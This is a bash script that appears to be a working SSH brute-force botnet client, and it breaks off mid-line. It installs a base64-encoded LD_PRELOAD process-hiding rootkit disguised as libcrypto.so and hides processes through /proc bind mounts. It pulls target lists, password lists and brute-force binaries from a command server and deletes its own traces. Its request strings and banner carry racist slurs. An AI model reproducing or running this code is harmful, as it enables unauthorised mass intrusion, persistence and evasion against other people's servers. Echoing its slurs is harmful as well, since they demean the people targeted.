shopt -s expand_aliases alias curl="./curl -A 'curl/7.85.0' " ver="15" BLACK="\033[30m" RED="\033[31m" GREEN="\033[32m" YELLOW="\033[33m" BLUE="\033[34m" MAGENTA="\033[35m" CYAN="\033[36m" WHITE="\033[37m" LBLACK="\033[90m" LRED="\033[91m" LGREEN="\033[92m" LYELLOW="\033[93m" LBLUE="\033[94m" LMAGENTA="\033[95m" LCYAN="\033[96m" LWHITE="\033[97m" RESET="\033[0m" download() { url="$1" output="$2" if [ ! -z "$url" ]; then url="url = \"$url\"" if [ ! -z "$output" ]; then output="output = \"$output\"" fi curl -K - << EOF ipv4 fail silent connect-timeout = 10 max-time = 60 retry = 2 $url $output EOF fi sync } hide() { [[ -L /etc/mtab ]] && { cp -f /etc/mtab /etc/mtab.bak; mv -f /etc/mtab.bak /etc/mtab; } _pid=${1:-$$} [[ $_pid =~ ^[0-9]+$ ]] && { mount -n --bind /dev/shm /proc/$_pid ;return; } local _argstr for _x in "${@:2}"; do _argstr+=" '${_x//\'/\'\"\'\"\'}'"; done [[ $(bash -c "ps -o stat= -p \$\$") =~ \+ ]] || exec bash -c "mount -n --bind /dev/shm /proc/\$\$; exec \"$1\" $_argstr" bash -c "mount -n --bind /dev/shm /proc/\$\$; exec \"$1\" $_argstr" } hideshit() { hide $$ } shred() { [[ -z $1 || ! -f "$1" ]] && { echo >&2 "shred [FILE]"; return 255; } dd bs=1k count=$(du -sk ${1:?} | cut -f1) if=/dev/urandom >"$1" rm -f "${1:?}" } libproc() { if [ "$EUID" == "0" ]; then echo "I2RlZmluZSBfR05VX1NPVVJDRQoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxkbGZjbi5oPgojaW5jbHVkZSA8ZGlyZW50Lmg+CiNpbmNsdWRlIDxzdHJpbmcuaD4KI2luY2x1ZGUgPHVuaXN0ZC5oPgoKLyoKICogRXZlcnkgcHJvY2VzcyB3aXRoIHRoaXMgbmFtZSB3aWxsIGJlIGV4Y2x1ZGVkCiAqLwpzdGF0aWMgY29uc3QgY2hhciogcHJvY2Vzc190b19maWx0ZXIgPSAiLWJhc2giOwoKLyoKICogR2V0IGEgZGlyZWN0b3J5IG5hbWUgZ2l2ZW4gYSBESVIqIGhhbmRsZQogKi8Kc3RhdGljIGludCBnZXRfZGlyX25hbWUoRElSKiBkaXJwLCBjaGFyKiBidWYsIHNpemVfdCBzaXplKQp7CiAgICBpbnQgZmQgPSBkaXJmZChkaXJwKTsKICAgIGlmKGZkID09IC0xKSB7CiAgICAgICAgcmV0dXJuIDA7CiAgICB9CgogICAgY2hhciB0bXBbNjRdOwogICAgc25wcmludGYodG1wLCBzaXplb2YodG1wKSwgIi9wcm9jL3NlbGYvZmQvJWQiLCBmZCk7CiAgICBzc2l6ZV90IHJldCA9IHJlYWRsaW5rKHRtcCwgYnVmLCBzaXplKTsKICAgIGlmKHJldCA9PSAtMSkgewogICAgICAgIHJldHVybiAwOwogICAgfQoKICAgIGJ1ZltyZXRdID0gMDsKICAgIHJldHVybiAxOwp9CgovKgogKiBHZXQgYSBwcm9jZXNzIG5hbWUgZ2l2ZW4gaXRzIHBpZAogKi8Kc3RhdGljIGludCBnZXRfcHJvY2Vzc19uYW1lKGNoYXIqIHBpZCwgY2hhciogYnVmKQp7CiAgICBpZihzdHJzcG4ocGlkLCAiMDEyMzQ1Njc4OSIpICE9IHN0cmxlbihwaWQpKSB7CiAgICAgICAgcmV0dXJuIDA7CiAgICB9CgogICAgY2hhciB0bXBbMjU2XTsKICAgIHNucHJpbnRmKHRtcCwgc2l6ZW9mKHRtcCksICIvcHJvYy8lcy9zdGF0IiwgcGlkKTsKCiAgICBGSUxFKiBmID0gZm9wZW4odG1wLCAiciIpOwogICAgaWYoZiA9PSBOVUxMKSB7CiAgICAgICAgcmV0dXJuIDA7CiAgICB9CgogICAgaWYoZmdldHModG1wLCBzaXplb2YodG1wKSwgZikgPT0gTlVMTCkgewogICAgICAgIGZjbG9zZShmKTsKICAgICAgICByZXR1cm4gMDsKICAgIH0KCiAgICBmY2xvc2UoZik7CgogICAgaW50IHVudXNlZDsKICAgIHNzY2FuZih0bXAsICIlZCAoJVteKV1zIiwgJnVudXNlZCwgYnVmKTsKICAgIHJldHVybiAxOwp9CgojZGVmaW5lIERFQ0xBUkVfUkVBRERJUihkaXJlbnQsIHJlYWRkaXIpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCnN0YXRpYyBzdHJ1Y3QgZGlyZW50KiAoKm9yaWdpbmFsXyMjcmVhZGRpcikoRElSKikgPSBOVUxMOyAgICAgICAgICAgICAgIFwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXApzdHJ1Y3QgZGlyZW50KiByZWFkZGlyKERJUiAqZGlycCkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCnsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgIGlmKG9yaWdpbmFsXyMjcmVhZGRpciA9PSBOVUxMKSB7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgICAgIG9yaWdpbmFsXyMjcmVhZGRpciA9IGRsc3ltKFJUTERfTkVYVCwgInJlYWRkaXIiKTsgICAgICAgICAgICAgICBcCiAgICAgICAgaWYob3JpZ2luYWxfIyNyZWFkZGlyID09IE5VTEwpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICB7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgICAgICAgICBmcHJpbnRmKHN0ZGVyciwgIkVycm9yIGluIGRsc3ltOiAlc1xuIiwgZGxlcnJvcigpKTsgICAgICAgICBcCiAgICAgICAgfSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgIH0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCiAgICBzdHJ1Y3QgZGlyZW50KiBkaXI7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgd2hpbGUoMSkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCiAgICB7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICBkaXIgPSBvcmlnaW5hbF8jI3JlYWRkaXIoZGlycCk7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgICAgIGlmKGRpcikgeyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCiAgICAgICAgICAgIGNoYXIgZGlyX25hbWVbMjU2XTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICAgICAgY2hhciBwcm9jZXNzX25hbWVbMjU2XTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgICAgICAgICBpZihnZXRfZGlyX25hbWUoZGlycCwgZGlyX25hbWUsIHNpemVvZihkaXJfbmFtZSkpICYmICAgICAgICBcCiAgICAgICAgICAgICAgICBzdHJjbXAoZGlyX25hbWUsICIvcHJvYyIpID09IDAgJiYgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICAgICAgICAgIGdldF9wcm9jZXNzX25hbWUoZGlyLT5kX25hbWUsIHByb2Nlc3NfbmFtZSkgJiYgICAgICAgICAgXAogICAgICAgICAgICAgICAgc3RyY21wKHByb2Nlc3NfbmFtZSwgcHJvY2Vzc190b19maWx0ZXIpID09IDApIHsgICAgICAgICBcCiAgICAgICAgICAgICAgICBjb250aW51ZTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICAgICAgfSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgICAgIH0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCiAgICAgICAgYnJlYWs7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgIH0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgcmV0dXJuIGRpcjsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCn0KCkRFQ0xBUkVfUkVBRERJUihkaXJlbnQ2NCwgcmVhZGRpcjY0KTsKREVDTEFSRV9SRUFERElSKGRpcmVudCwgcmVhZGRpcik7Cg==" |base64 -d > libprocesshider.c gcc -Wall -fPIC -shared -o libprocesshider.so libprocesshider.c -ldl >/dev/null 2>&1 if [ -f libprocesshider.so ]; then chattr -ai /etc/ld.so.preload /lib/x86_64-linux-gnu/libcrypto.so 2> /dev/null mkdir /lib/x86_64-linux-gnu/ 2>/dev/null rm -Rf /lib/x86_64-linux-gnu/libcrypto.so mv libprocesshider.so /lib/x86_64-linux-gnu/libcrypto.so 2>/dev/null sed -i '/libcrypto/d' /etc/ld.so.preload 2> /dev/null echo -e '/lib/x86_64-linux-gnu/libcrypto.so '>> /etc/ld.so.preload chattr +ai /etc/ld.so.preload /lib/x86_64-linux-gnu/libcrypto.so 2>/dev/null else hide `ps -ef |grep ./-bash |grep -v grep |awk '{print $2}'` fi fi rm -Rf libprocesshider.c 2> /dev/null } post() { url="$1" postid="$2" vuln="$3" url="url = \"$url\"" if [ ! -z "$postid" ]; then postid="form = \"$postid\"" fi if [ ! -z "$vuln" ]; then vuln="form = \"$vuln\"" fi if [ ! -z "$url" ]; then curl -K - << EOF ipv4 fail silent connect-timeout = 10 max-time = 60 retry = 2 request = POST $postid $vuln $url EOF fi sync } get_pass_file() { mkdir -p pass_files pass_file=pass.lst pass=$(download "$host/$api?endpoint=randompass&host=$(uname -n)&dirty=fucking.sand.niggers" "pass_files/$pass_file") sed -i '/^[[:blank:]]*$/d' "pass_files/$pass_file" } get_random_port() { port=$(download "$host/$api?endpoint=randomport&host=$(uname -n)&dirty=fucking.sand.niggers") } kill -9 `ps -ef |grep defunct |grep -v grep | awk '{print $2}'` 2>/dev/null program=$0 arch=$(uname -m) name=$(uname -n) checksum="b7cc547b0bbba00e801da054b5ffd932" classdir="class" dir=$(pwd) type=api libproc if [ ! -z "$1" ]; then scan_type="$1" if [ -z "$2" ]; then host="api.hellknight.xyz:8880/" else host="$2" fi api="api2.php" if [ "$arch" == "aarch64" ]; then speed="worst" else speed="slow" fi banner_type="prg" brute_type="spirit1" brute_cmd="echo \"PROC:\$(nproc 2> /dev/null) UNAME:\$(uname -a 2> /dev/null)\"" fi if [ -z "$scan_type" ]; then echo -e " ${YELLOW}-----------------------------SCAN TYPE${YELLOW}----------------------------${RESET}" echo -ne " ${YELLOW}[${GREEN} Enter scan type ( E.g autoscan / randomscan ) ${YELLOW}] \n ${CYAN}scan_type : " read scan_type echo -e " ${YELLOW}-----------------------------SCAN TYPE${YELLOW}----------------------------${RESET}" if [ -z "$scan_type" ]; then scan_type="randomscan" fi else scan_type=$scan_type fi if [ "$scan_type" == "autoscan" ]; then if [ -z "$autoscan" ]; then echo -e " ${YELLOW}-----------------------------AUTOSCAN${YELLOW}-----------------------------${RESET}" echo -ne " ${YELLOW}[${GREEN} Enter your autoscan name ( E.g user@host ) ${YELLOW}] \n ${CYAN}AUTOSCAN : " read autoscan echo -e " ${YELLOW}-----------------------------AUTOSCAN${YELLOW}-----------------------------${RESET}" if [ -z "$autoscan" ]; then autoscan="$pass@$((cat /etc/machine-id /var/lib/dbus/machine-id 2>/dev/null || uname -n | tr '.' '-') | head -n 1)" fi else autoscan=$autoscan fi if [ -z "$autoscan_date" ]; then echo -e " ${YELLOW}-----------------------------AUTOSCAN DATE${YELLOW}-----------------------------${RESET}" echo -ne " ${YELLOW}[${GREEN} Enter autoscan date ( E.g dd-mm-yyyy ) ${YELLOW}] \n ${CYAN}AUTOSCAN DATE: " read autoscan_date echo -e " ${YELLOW}-----------------------------AUTOSCAN DATE${YELLOW}-----------------------------${RESET}" else autoscan_date=$autoscan_date fi fi if [ -z "$host" ]; then echo -e " ${YELLOW}-----------------------------API HOST${YELLOW}-----------------------------${RESET}" echo -ne " ${YELLOW}[${GREEN} Enter your api hostname ( E.g api.mydomain.com ) ${YELLOW}] \n ${CYAN}HOST : " read host echo -e " ${YELLOW}-----------------------------API HOST${YELLOW}-----------------------------${RESET}" if [ -z "$host" ]; then host="api.hellknight.xyz:8880" fi else host=$host fi if [ -z "$api" ]; then echo -e " ${YELLOW}-----------------------------API FILE${YELLOW}-----------------------------${RESET}" echo -ne " ${YELLOW}[${GREEN} Enter your api filename ( E.g api.php ) ${YELLOW}] \n ${CYAN}API : " read api echo -e " ${YELLOW}-----------------------------API FILE${YELLOW}-----------------------------${RESET}" if [ -z "$api" ]; then api="api2.php" fi else api=$api fi if [ -z "$speed" ]; then echo -e " ${YELLOW}-------------------------SCAN/BRUTE SPEED${YELLOW}-------------------------${RESET}" echo -ne " ${YELLOW}[${GREEN} Enter scan/brute speed ( E.g slow / normal / fast ) ${YELLOW}] \n ${CYAN}SPEED : " read speed echo -e " ${YELLOW}-------------------------SCAN/BRUTE SPEED${YELLOW}-------------------------${RESET}" if [ -z "$speed" ]; then if [ "$arch" == "aarch64" ]; then speed="worst" else speed="slow" fi fi else speed=$speed fi if [ -z "$banner_type" ]; then echo -e " ${YELLOW}----------------------------BANNER TYPE${YELLOW}---------------------------${RESET}" echo -ne " ${YELLOW}[${GREEN} Enter banner type ( E.g bssh / prg / spirit ) ${YELLOW}] \n ${CYAN}banner_type : " read banner_type echo -e " ${YELLOW}----------------------------BANNER TYPE${YELLOW}---------------------------${RESET}" if [ -z "$banner_type" ]; then banner_type=spirit fi else banner_type=$banner_type fi if [ -z "$banner_threads" ]; then if [ "$speed" == "fast" ]; then banner_threads=1500 elif [ "$speed" == "normal" ]; then banner_threads=800 elif [ "$speed" == "slow" ]; then banner_threads=500 elif [ "$speed" == "worst" ]; then banner_threads=100 fi else banner_threads=$banner_threads fi if [ -z "$banner_timeout" ]; then if [ "$speed" == "fast" ]; then banner_timeout=3 elif [ "$speed" == "normal" ]; then banner_timeout=5 elif [ "$speed" == "slow" ]; then banner_timeout=8 elif [ "$speed" == "worst" ]; then banner_timeout=10 fi else banner_timeout=$banner_timeout fi if [ "$banner_type" == "bssh" ]; then if [ -z "$banner_key" ]; then echo -e " ${YELLOW}-----------------------------BANNER KEY${YELLOW}-----------------------------${RESET}" echo -ne " ${YELLOW}[${GREEN} Enter bssh banner api key ( E.g asdfsaqz ) ${YELLOW}] \n ${CYAN}banner_key : " read banner_key echo -e " ${YELLOW}-----------------------------BANNER KEY${YELLOW}-----------------------------${RESET}" if [ -z "$banner_key" ]; then banner_key=asdfsaqz fi else banner_key=$banner_key fi fi if [ "$brute_type" == "spirit" ]; then if [ -z "$spirit_type" ]; then echo -e " ${YELLOW}-----------------------------SPIRIT TYPE${YELLOW}-----------------------------${RESET}" echo -ne " ${YELLOW}[${GREEN} Enter spirit version type ( E.g free / pro ) ${YELLOW}] \n ${CYAN}spirit_type : " read spirit_type echo -e " ${YELLOW}-----------------------------SPIRIT TYPE${YELLOW}-----------------------------${RESET}" if [ -z "$spirit_type" ]; then spirit_type=pro fi else spirit_type=$spirit_type fi if [ -z "$spirit_api" ]; then echo -e " ${YELLOW}-----------------------------SPIRIT API${YELLOW}-----------------------------${RESET}" echo -ne " ${YELLOW}[${GREEN} Enter spirit api ( E.g qwerty123 ) ${YELLOW}] \n ${CYAN}spirit_api : " read spirit_api echo -e " ${YELLOW}-----------------------------SPIRIT API${YELLOW}-----------------------------${RESET}" if [ -z "$spirit_api" ]; then spirit_api=free fi else spirit_api=$spirit_api fi if [ -z "$spirit_limit" ]; then echo -e " ${YELLOW}-----------------------------SPIRIT LIMIT${YELLOW}-----------------------------${RESET}" echo -ne " ${YELLOW}[${GREEN} Enter spirit ips limit ( E.g 999 / unlimited ) ${YELLOW}] \n ${CYAN}spirit_limit : " read spirit_limit echo -e " ${YELLOW}-----------------------------SPIRIT LIMIT${YELLOW}-----------------------------${RESET}" if [ -z "$spirit_limit" ]; then spirit_limit=unlimited fi else spirit_limit=$spirit_limit fi fi brute_threads=1500 if [ -z "$brute_timeout" ]; then if [ "$speed" == "fast" ]; then brute_timeout=3 elif [ "$speed" == "normal" ]; then brute_timeout=5 elif [ "$speed" == "slow" ]; then brute_timeout=8 elif [ "$speed" == "worst" ]; then brute_timeout=10 fi else brute_timeout=$brute_timeout fi if [ -z "$brute_f2b" ]; then if [ "$brute_type" == "spirit" ]; then brute_f2b=true else brute_f2b=5 fi else brute_f2b=$brute_f2b fi brute_cmd="echo \"PROC:\$(nproc 2> /dev/null) UNAME:\$(uname -a 2> /dev/null)\"" if [ -z "$sleep_time" ]; then sleep_time=3 else sleep_time=$sleep_time fi perl bot [NS][$arch][$ver][$name] NScan 2>/dev/null sleep 1 hideshit rm -rf a auth authusers bot 2>/dev/null if [ "$brute_type" == "spirit1" ]; then wget "$host/spirit-$arch.tgz" -O ./tmp.tgz wait tar -zxf tmp.tgz;rm -Rf tmp.tgz fi if [ "$scan_type" != "autoscan" ] && [ "$scan_type" != "randomscan" ]; then echo -e " ${YELLOW}------------------------------Invalid Scan Type${YELLOW}------------------------------${RESET}" echo -e " ${YELLOW}[${GREEN} Choose autoscan OR randomscan ${YELLOW}]" echo -e " ${YELLOW}------------------------------Invalid Scan Type${YELLOW}------------------------------${RESET}" exit; fi if [ "$speed" != "fast" ] && [ "$speed" != "normal" ] && [ "$speed" != "slow" ] && [ "$speed" != "worst" ]; then echo -e " ${YELLOW}------------------------------Invalid Speed${YELLOW}------------------------------${RESET}" echo -e " ${YELLOW}[${GREEN} Choose fast OR normal OR slow OR worst ${YELLOW}]" echo -e " ${YELLOW}------------------------------Invalid Speed${YELLOW}------------------------------${RESET}" exit; fi if [ "$banner_type" != "bssh" ] && [ "$banner_type" != "prg" ] && [ "$banner_type" != "spirit" ]; then echo -e " ${YELLOW}---------------------------Invalid Banner Type${YELLOW}---------------------------${RESET}" echo -e " ${YELLOW}[${GREEN} Choose bssh / prg / spirit ${YELLOW}]" echo -e " ${YELLOW}---------------------------Invalid Banner Type${YELLOW}---------------------------${RESET}" exit; exit; fi if [[ ! "$banner_threads" =~ ^[0-9]+$ ]] || (( $banner_threads > 1500 )); then echo -e " ${YELLOW}-------------------Invalid Banner Threads No# [$banner_threads]${YELLOW}-------------------${RESET}" echo -e " ${YELLOW}[${GREEN} threads range 1-1500 ${YELLOW}]" echo -e " ${YELLOW}-------------------Invalid Banner Threads No# [$banner_threads]${YELLOW}-------------------${RESET}" exit fi if [[ ! "$banner_timeout" =~ ^[0-9]+$ ]] || (( $banner_timeout > 100 )); then echo -e " ${YELLOW}---------------------Invalid Banner Timeout No [$banner_timeout]${YELLOW}---------------------${RESET}" echo -e " ${YELLOW}[${GREEN} timeout range 1-100 ${YELLOW}]" echo -e " ${YELLOW}---------------------Invalid Banner Timeout No [$banner_timeout]${YELLOW}---------------------${RESET}" exit fi if [ "$brute_type" != "haiduc" ] && [ "$brute_type" != "haita" ] && [ "$brute_type" != "zhcn" ] && [ "$brute_type" != "spirit1" ] && [ "$brute_type" != "prg" ] && [ "$brute_type" != "prg75" ]; then echo -e " ${YELLOW}---------------------------Invalid Brute Type${YELLOW}---------------------------${RESET}" echo -e " ${YELLOW}[${GREEN} Choose haiduc / haita / zhcn / spirit ${YELLOW}]" echo -e " ${YELLOW}---------------------------Invalid Brute Type${YELLOW}---------------------------${RESET}" exit; exit; fi if [[ ! "$brute_threads" =~ ^[0-9]+$ ]] || (( $brute_threads > 5000 )); then echo -e " ${YELLOW}--------------------Invalid Brute Threads No# [$brute_threads]${YELLOW}--------------------${RESET}" echo -e " ${YELLOW}[${GREEN} threads range 1-1500 ${YELLOW}]" echo -e " ${YELLOW}--------------------Invalid Brute Threads No# [$brute_threads]${YELLOW}--------------------${RESET}" exit fi if [[ ! "$brute_timeout" =~ ^[0-9]+$ ]] || (( $brute_timeout > 100 )); then echo -e " ${YELLOW}-----------------------Invalid Brute Timeout No [$brute_timeout]${YELLOW}-----------------------${RESET}" echo -e " ${YELLOW}[${GREEN} timeout range 1-100 ${YELLOW}]" echo -e " ${YELLOW}-----------------------Invalid Brute Timeout No [$brute_timeout]${YELLOW}-----------------------${RESET}" exit fi if [ "$brute_type" == "spirit" ]; then if [ "$brute_f2b" != "true" ] && [ "$brute_f2b" != "false" ]; then echo -e " ${YELLOW}-----------------------Invalid Brute Fail2ban [$brute_f2b]${YELLOW}-----------------------${RESET}" echo -e " ${YELLOW}[${GREEN} Fail2ban true / false ${YELLOW}]" echo -e " ${YELLOW}-----------------------Invalid Brute Fail2ban [$brute_f2b]${YELLOW}-----------------------${RESET}" exit fi if [ "$spirit_type" != "free" ] && [ "$spirit_type" != "pro" ]; then echo -e " ${YELLOW}-----------------------Invalid Spirit Type [$spirit_type]${YELLOW}-----------------------${RESET}" echo -e " ${YELLOW}[${GREEN} Spirit Type free / pro ${YELLOW}]" echo -e " ${YELLOW}-----------------------Invalid Spirit Type [$spirit_type]${YELLOW}-----------------------${RESET}" exit fi if [ -z "$spirit_api" ]; then echo -e " ${YELLOW}-----------------------Spirit Api${YELLOW}-----------------------${RESET}" echo -e " ${YELLOW}[${GREEN} Spirit Api Requied! ${YELLOW}]" echo -e " ${YELLOW}-----------------------Spirit Api${YELLOW}-----------------------${RESET}" exit else spirit_api="$spirit_api-$arch" download_spirit spirit_status fi if [ "$spirit_limit" != "999" ] && [ "$spirit_limit" != "unlimited" ]; then echo -e " ${YELLOW}-----------------------Invalid Spirit Limit [$spirit_limit]${YELLOW}-----------------------${RESET}" echo -e " ${YELLOW}[${GREEN} Spirit Limit 999 / unlimited ${YELLOW}]" echo -e " ${YELLOW}-----------------------Invalid Spirit Limit [$spirit_limit]${YELLOW}-----------------------${RESET}" exit fi else if [[ ! "$brute_f2b" =~ ^[0-9]+$ ]] || (( $brute_f2b > 100 )); then echo -e " ${YELLOW}-----------------------Invalid Brute Fail2ban [$brute_f2b]${YELLOW}-----------------------${RESET}" echo -e " ${YELLOW}[${GREEN} Fail2ban range 1-100 ${YELLOW}]" echo -e " ${YELLOW}-----------------------Invalid Brute Fail2ban [$brute_f2b]${YELLOW}-----------------------${RESET}" exit fi fi while true; do pass_no=0 echo -e " ${YELLOW}--------------------------$program CONFIGURATION------------------------" echo -e " ${YELLOW}[${GREEN}scan_type${WHITE}:${RED}$scan_type${YELLOW}]" echo -e " ${YELLOW}[${GREEN}host${WHITE}:${RED}hates${YELLOW}] ${YELLOW}[${GREEN}api${WHITE}:${RED}sand.niggers.php${YELLOW}] ${YELLOW}[${GREEN}port${WHITE}:${RED}$port${YELLOW}] ${YELLOW}[${GREEN}speed${WHITE}:${RED}$speed${YELLOW}] ${YELLOW}[${GREEN}type${WHITE}:${RED}$type${YELLOW}]" echo -e " ${YELLOW}[${GREEN}banner_type${WHITE}:${RED}$banner_type${YELLOW}] ${YELLOW}[${GREEN}banner_threads${WHITE}:${RED}$banner_threads${YELLOW}] ${YELLOW}[${GREEN}banner_timeout${WHITE}:${RED}$banner_timeout${YELLOW}]" echo -e " ${YELLOW}[${GREEN}brute_type${WHITE}:${RED}$brute_type${YELLOW}] ${YELLOW}[${GREEN}brute_threads${WHITE}:${RED}$brute_threads${YELLOW}] ${YELLOW}[${GREEN}brute_timeout${WHITE}:${RED}$brute_timeout${YELLOW}] ${YELLOW}[${GREEN}brute_f2b${WHITE}:${RED}$brute_f2b${YELLOW}]" echo -e " ${YELLOW}[${GREEN}pass_file${WHITE}:${RED}$pass_file${YELLOW}] ${YELLOW}[${GREEN}sleep_time${WHITE}:${RED}$sleep_time${YELLOW}]" echo -e " ${YELLOW}--------------------------$program CONFIGURATION${YELLOW}------------------------${RESET}" kill -9 $(ps -A -ostat,ppid | grep -e '[zZ]'| awk '{ print $2 }') >/dev/null 2>&1 kill $(ps -A -ostat,ppid | awk '/[zZ]/ && !a[$2]++ {print $2}') >/dev/null 2>&1 if [ -z "$scanbot" ]; then echo -e " ${YELLOW}-------------------------Getting Server Ip------------------------${RESET}" MYIP=$(download "$host/$api?endpoint=ip&host=$(uname -n)&dirty=fucking.sand.niggers") if [ ! -z "$MYIP" ]; then IP=$(echo $MYIP | awk -F . -v rseed=$RANDOM 'BEGIN{srand(rseed);}{print $1"."$2"."int(rand()*200)"."int(rand()*200)}') fi if [ -z "$IP" ]; then IP=$(/sbin/ifconfig 2> /dev/null | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' | sort | uniq | grep -v -e "^10." -e "^127" -e "^255" -e "255$" -e "^172." -e "^192.168") if [ -z "$IP" ]; then IP=$(/sbin/ifconfig 2> /dev/null | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' | uniq | head -n 1) if [ -z "$IP" ]; then IP=$(echo "" | awk -v rseed=$RANDOM 'BEGIN{srand(rseed);}{print int(rand()*200)"."int(rand()*200)"."int(rand()*200)"."int(rand()*200)}') fi fi else IP_CLASS=$(echo $IP | awk -F . {'print $1"."$2'}) fi if [ -z "$MYIP" ]; then MYIP="$IP" fi if [ -z "$IP_CLASS" ]; then IP_CLASS="255.255" fi if [ ! -z "$1" ]; then scanips=" $@" fi pubnick="$(whoami)@$IP" privnick="$(whoami)@$MYIP" fi echo -e " ${YELLOW}-------------------------Removing Trash Files-------------------------${RESET}" line_count=$(./spirit/-bash |grep upgrade > abc ; tail -n1 abc |grep upgrade|wc -l);rm -Rf abc; binary="./spirit/-bash" count=$("./spirit/-bash" 2>/dev/null | grep -i upgrade | tail -n1 | grep -c upgrade) if [ ! -x "./spirit/-bash" ]; then wget "$host/spirit-$arch.tgz" -O ./tmp.tgz;tar -zxf tmp.tgz;rm -Rf tmp.tgz sleep 2 count=1 else count=$("./spirit/-bash" 2>/dev/null | grep -i upgrade | tail -n1 | grep -c upgrade) if [ "$count" -eq 1 ]; then wget "$host/spirit-$arch.tgz" -O ./tmp.tgz;tar -zxf tmp.tgz;rm -Rf tmp.tgz fi fi ./spirit/-bash 2>tmp1 x=$(tail -n2 tmp1 | tr -d '\n' | sed 's/[[:space:]]*$//' | sed 's/\x1b\[[0-9;]*m//g') rm -Rf tmp1 if [[ "$x" == *"Spirit Pro"* ]]; then echo "" else wget "$host/spirit-$arch.tgz" -O ./tmp.tgz;tar -zxf tmp.tgz;rm -Rf tmp.tgz fi rm -rf -- pass_files/pass_file a auth authusers bot bssh haiduc ./-bash.prg config.ini filtered.txt ./$(cat /etc/machine-id) i pass_files lan haita masscan prg pscan ss timeout zhcn clear i b.lst block.lst h.lst p.lst scan.log bios.txt paused.conf ips banners.log ssh.log ssh_vuln.log banner.log scanbot.lst /tmp/systemd-private-72b48c8a9d7b4d31a67993100673db5b-systemd-logind.service-wKjbYi prg75 ./-bash 2>/dev/null if [ "$brute_type" == "spirit1" ]; then echo "" #download "$host/spiritx86_64.tgz" ./tmp.tgz; tar -zxf tmp.tgz;rm -Rf tmp.tgz else port=$(download "$host/$api?endpoint=randomport&host=$(uname -n)&dirty=fucking.sand.niggers") fi sleep $sleep_time echo -e " ${YELLOW}-------------------------Trying Iplist Api------------------------${RESET}" while true; do if [ "$brute_type" == "spirit1" ]; then ip_file=$(download "$host/api2.php?endpoint=randomspirit&host=$(uname -n)&dirty=fucking.sand.niggers" i) else ip_file=$(download "$host/.ports/port-$port.lst" i) fi echo -e " ${YELLOW}----------------------------Counting OS IPS----------------------------${RESET}" get_pass_file sleep $sleep_time vulns=$(wc -l i | awk {'print $1'}) total_pass=$(cat pass_files/$pass_file | wc -l) echo -e " IP/PORT: ${YELLOW}[$vulns:$port]${RESET} " echo -e " ${YELLOW}--------------------------Removing Bad Banners-------------------------${RESET}" total_ips=$(wc -l i | awk {'print $1'}) sleep $sleep_time echo -e " ${YELLOW}---------------------------Removing Trash Files------------------------${RESET}" rm -rf ssh.log scan.log ssh_vuln.log input.txt banners.log banner.log 2>/dev/null sleep $sleep_time total_pass=$(cat pass_files/$pass_file | wc -l) echo -e " ${YELLOW}-------------------------Total Passwords [ $total_pass ]------------------------${RESET}" sleep $sleep_time echo -e " ${YELLOW}-------------Bruter Started [ $total_ips:$pass_file {$port} $total_ips:$total_pass]-------------${RESET}" if [ "$brute_type" == "prg" ]; then download "$host/prg" ./-bash.prg chmod +sx ./-bash.prg mv i ips.lst mv pass_files/pass.lst ./pass.lst ./-bash.prg 250 $port normal PRG-oldTeam rm -Rf ./$brute_type/ i pass_files/$pass_file ips.lst pass.lst ./-bash.prg 2>/dev/null fi if [ "$brute_type" == "spirit1" ]; then binary="./spirit/-bash" count=$("./spirit/-bash" 2>/dev/null | grep -i upgrade | tail -n1 | grep 